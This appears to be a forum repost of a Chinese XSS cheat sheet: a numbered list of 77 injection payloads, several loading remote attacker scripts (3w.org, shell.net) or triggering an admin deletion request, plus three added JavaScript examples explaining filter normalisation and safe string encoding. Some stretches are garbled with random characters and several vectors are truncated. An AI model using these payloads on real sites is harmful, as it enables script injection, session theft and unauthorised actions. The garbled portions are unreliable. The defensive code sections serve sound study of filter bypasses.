It seems t00ls has relatively little material on XSS; I saw some good stuff and copied it over, not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML decimal character references (with semicolons)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (XSS calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (XSS calculator)
<IMG SRC=jav..omitted..S')>
(9) Long UTF-8 Unicode encoding without semicolons (XSS calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding without semicolons (XSS calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab splitting "javascript" (a literal tab between "jav" and "ascript", which the forum displays as a space)
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multi-line injected JavaScript, a more extreme form of the same vector
<IMG SRC="javascript:alert('XSS')">
- X' G& |$ D7 B" w- Q(16)解决限制字符(要求同页面)
/ B, o4 j9 J- z1 f0 S H<script>z=’document.’</script>
E+ |. n, |: ^<script>z=z+’write(“‘</script>
9 h) S3 ^( y, G<script>z=z+’<script’</script>
1 P6 x0 d$ l, U* H* O O) ]<script>z=z+’ src=ht’</script>7 _: s0 `. }& \) P! O
<script>z=z+’tp://ww’</script>2 N4 x4 h; |1 L& r: p( Y
<script>z=z+’w.shell’</script>
2 I- L; W1 T) z$ \4 f<script>z=z+’.net/1.’</script>
9 Q" `$ q" Y8 g( q# N, V<script>z=z+’js></sc’</script>4 G% r$ A. M( ~/ F# j- B" @* ?
<script>z=z+’ript>”)’</script>
/ u4 R2 ]2 p9 _) K( L<script>eval_r(z)</script>) j, t: W% O7 o- u3 Z0 ]1 X
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null bytes basically have no effect in China, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
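Why the encoding and whitespace tricks in (5), (7) to (14) and (19) beat a plain string match, as an added JavaScript example (not part of the original cheat sheet): a browser first decodes HTML character references in the attribute, then its URL parser trims leading control characters and removes every tab, newline and carriage return before it reads the scheme. A filter that compares the raw attribute text compares the wrong string. The sample inputs are constructed from the vector shapes above; the function names are chosen for this example.

```javascript
// Added example: normalise an attribute URL the way the browser does before
// checking its scheme, and compare with a naive substring check.

// Legacy named references that HTML decodes even without a trailing semicolon.
const LEGACY_NAMED_REFS = { amp: "&", lt: "<", gt: ">", quot: '"' };

// Decode numeric (&#106; &#x6A;) and legacy named references. The semicolon is
// optional for numeric references, which is why (9) and (10) work without one.
function decodeHtmlRefs(value) {
  return value.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp > 0x10ffff ? match : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(LEGACY_NAMED_REFS, body)
      ? LEGACY_NAMED_REFS[body]
      : match;
  });
}

// Mimic the URL parser's pre-processing: strip leading/trailing C0 controls and
// space, remove tab/LF/CR anywhere, then read the scheme case-insensitively.
function extractScheme(url) {
  const stripped = url
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// The check a hurried filter writes.
function naiveIsDangerous(attrValue) {
  return attrValue.includes("javascript:");
}

// The check that sees what the browser sees (vbscript: covers vector (40)).
function isDangerousUrl(attrValue) {
  const scheme = extractScheme(decodeHtmlRefs(attrValue));
  return scheme === "javascript" || scheme === "vbscript";
}

// Constructed inputs in the shape of the vectors above; the last one is benign.
const SAMPLES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "jav\tascript:alert('XSS')",
  "jav&#x09;ascript:alert('XSS')",
  "jav&#x0A;ascript:alert('XSS')",
  "jav&#x0D;ascript:alert('XSS')",
  " &#14;  javascript:alert('XSS')",
  "http://3w.org/XSS/xss.js",
];

// Returns, per sample, what each filter decides.
function compareFilters(samples = SAMPLES) {
  return samples.map((input) => ({
    input,
    naive: naiveIsDangerous(input),
    normalised: isDangerousUrl(input),
  }));
}

for (const row of compareFilters()) {
  console.log(JSON.stringify(row.input), "naive:", row.naive, "normalised:", row.normalised);
}
```

The naive check flags only the two samples that literally contain "javascript:"; the normalised check flags every vector and still passes the plain http URL.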
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and some other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes (when input lands inside a JS string and only the quotes are backslash-escaped)
\";alert('XSS');//
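What (29) exploits, shown as an added JavaScript example (not part of the original cheat sheet): a page writes user text into a script string and "escapes" it by backslashing double quotes. The payload's own leading backslash swallows the backslash the escaper adds, so the quote that follows really ends the string and the rest of the input runs as code. The `renderWeak`, `renderSafe` and `payloadExecuted` functions and the `sink.pwned` flag standing in for alert('XSS') are constructed for this example.

```javascript
// Added example: quote-only escaping versus a proper JS string literal encoder.

// The weak escaper: handles the double quote and nothing else.
function escapeQuotesOnly(s) {
  return s.replace(/"/g, '\\"');
}

// Correct: let the JSON encoder produce the literal (it escapes backslashes and
// quotes together), then also escape the characters that matter to the HTML
// parser so the enclosing <script> element cannot be closed early either.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Two ways a template might emit  var name = "<user input>";
function renderWeak(userInput) {
  return 'var name = "' + escapeQuotesOnly(userInput) + '";';
}

function renderSafe(userInput) {
  return "var name = " + jsStringLiteral(userInput) + ";";
}

// Execute the generated script with a sink object in scope. If the injected
// statement runs, it flips sink.pwned (our stand-in for alert('XSS')).
function payloadExecuted(script) {
  const sink = { pwned: false };
  try {
    new Function("sink", script)(sink);
  } catch (e) {
    // A SyntaxError means the payload did not run as code either.
  }
  return sink.pwned;
}

// Constructed input in the shape of vector (29): backslash, quote, statement, comment.
const PAYLOAD = '\\";sink.pwned=true;//';

console.log("weak  :", renderWeak(PAYLOAD), "->", payloadExecuted(renderWeak(PAYLOAD)));
console.log("safe  :", renderSafe(PAYLOAD), "->", payloadExecuted(renderSafe(PAYLOAD)));
```

The weak rendering becomes `var name = "\\";sink.pwned=true;//";`: the string holds a single backslash, the statement executes, and the trailing `";` is commented out. The safe rendering keeps every character inside the literal.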
/ Y: L. M1 ~% p+ }, O4 G* T(30)结束Title标签7 J4 d% W- N1 ^, C( _
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 r9 @/ u, P$ [9 i) Z( A9 v1 r(31)Input Image1 p8 W$ u% B4 g8 k
<INPUT SRC=”javascript:alert(‘XSS’);”># C' `5 L% ~+ b& Z- P6 p4 E
(32)BODY Image0 L6 z8 ?/ P+ q* X! [9 ~9 U3 h
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
; v0 ?/ [- O0 B8 {% Z# o(33)BODY标签* |7 d6 C8 J9 {4 ?
<BODY(‘XSS’)>. G7 y" ?" t2 i* b( l
(34)IMG Dynsrc
- U& H8 Z3 ^9 B0 v8 C<IMG DYNSRC=”javascript:alert(‘XSS’)”>. B: ^( R( i( e; \% ^
(35)IMG Lowsrc! W& K) F# u0 _0 w5 H _ G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
: {/ N& f% X9 ^ N3 b(36)BGSOUND" @& |- f j1 k) G, L' p, x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
0 [' t/ {* U6 C( {! u+ \! _" i! }(37)STYLE sheet1 v) f% B3 |: C- b
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>4 d6 E8 C; h6 C* y- H. t
(38)远程样式表
$ g+ d% B- C# h1 @% z) K% L<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) s' U) O* z8 Q! V7 U(39)List-style-image(列表式)% ?0 L8 v0 g/ l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" H' Y$ F7 g$ j i& q% p- q5 c5 r(40)IMG VBscript
: c1 `, Q" M* x, l6 A<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, X/ s: w1 R8 {6 P8 O
(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters inserted (code points 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a comment splitting "expression"
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (anything that starts with "<" and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression (only the tail of this vector survived the copy)
exppression(alert("XSS"))'>
(53) STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash can assemble your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If ".js" is filtered, serve the JavaScript under an image file name; the browser executes whatever SCRIPT SRC returns regardless of the extension (the URL was lost in copying)
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command: the image request goes out with the victim's cookies, so it can trigger an authenticated action on that site (a CSRF request, not arbitrary command execution)
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2 (a.jpg on the same server as the page; a server-side redirect rule such as this .htaccess line turns the image fetch into the action)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL filter bypass: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(70) IP as a decimal dword
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding (the line break after "h" and the tabs, shown here as spaces, are part of the vector)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting "http:" (protocol-relative)
<A HREF="//www.google.com/">XSS</A>
(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
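How (68) to (76) look to a URL parser, as an added JavaScript example (not part of the original cheat sheet): the dword, hex, octal, mixed and trailing-dot spellings are all one host, so a filter that compares raw href strings against an allowlist or blocklist is beaten. The canonicaliser below follows the IPv4 parsing rules of the WHATWG URL standard (split on ".", drop one trailing empty label, read each label as hex, octal or decimal, let the last label fill the remaining bytes) and strips the tab/newline characters of (73) the way browsers do. Function names are chosen for this example.

```javascript
// Added example: reduce the host spellings above to one canonical form.

// Parse one dotted label: 0x prefix is hex, leading 0 is octal, otherwise decimal.
// Returns null when the label is not a number, which means "this is a DNS name".
function parseIpv4Label(label) {
  if (label === "") return null;
  let radix = 10;
  let digits = label;
  if (/^0[xX]/.test(label)) { radix = 16; digits = label.slice(2); }
  else if (label.length > 1 && label[0] === "0") { radix = 8; digits = label.slice(1); }
  if (digits === "") return 0; // a bare "0x" is zero per the URL standard
  const valid = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Returns dotted-decimal for any IPv4 literal form, or null for a DNS name.
function canonicalIpv4(host) {
  const labels = host.split(".");
  if (labels.length > 1 && labels[labels.length - 1] === "") labels.pop();
  if (labels.length > 4) return null;
  const nums = labels.map(parseIpv4Label);
  if (nums.some((n) => n === null)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null; // last label fills the rest
  let value = last;
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// DNS names: lower-case and drop the trailing dot of an absolute name (76).
// "www." is deliberately kept: google.com and www.google.com are different names
// that merely happen to serve the same site (75).
function canonicalHost(host) {
  const ip = canonicalIpv4(host);
  return ip !== null ? ip : host.toLowerCase().replace(/\.$/, "");
}

// Extract the host from an href. Browsers remove tab/LF/CR anywhere in the URL
// (73), and "//host/" without a scheme is protocol-relative (74).
function hostOf(href) {
  const cleaned = href.replace(/[\t\n\r]/g, "");
  const m = /^(?:[a-zA-Z][a-zA-Z0-9+.-]*:)?\/\/([^/?#]*)/.exec(cleaned);
  return m ? canonicalHost(m[1]) : null;
}

// Constructed hrefs in the shapes of vectors (68) to (77).
const HREFS = [
  "http://127.0.0.1/",
  "http://3232235521",
  "http://0xc0.0xa8.0x00.0x01",
  "http://0300.0250.0000.0001",
  "h\ntt\tp://6\t6.000146.0x7.147/",
  "//www.google.com/",
  "http://google.com/",
  "http://www.google.com./",
  "javascript:document.location='http://www.google.com/'",
];

for (const href of HREFS) console.log(JSON.stringify(href), "->", hostOf(href));
```

Three spellings of 192.168.0.1 and the mixed-encoding form collapse to plain dotted-decimal, the trailing-dot name equals its plain form, and the javascript: link yields no host at all, which is itself the signal a filter should act on.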
Original source: http://fuzzexp.org/u/0day/?p=14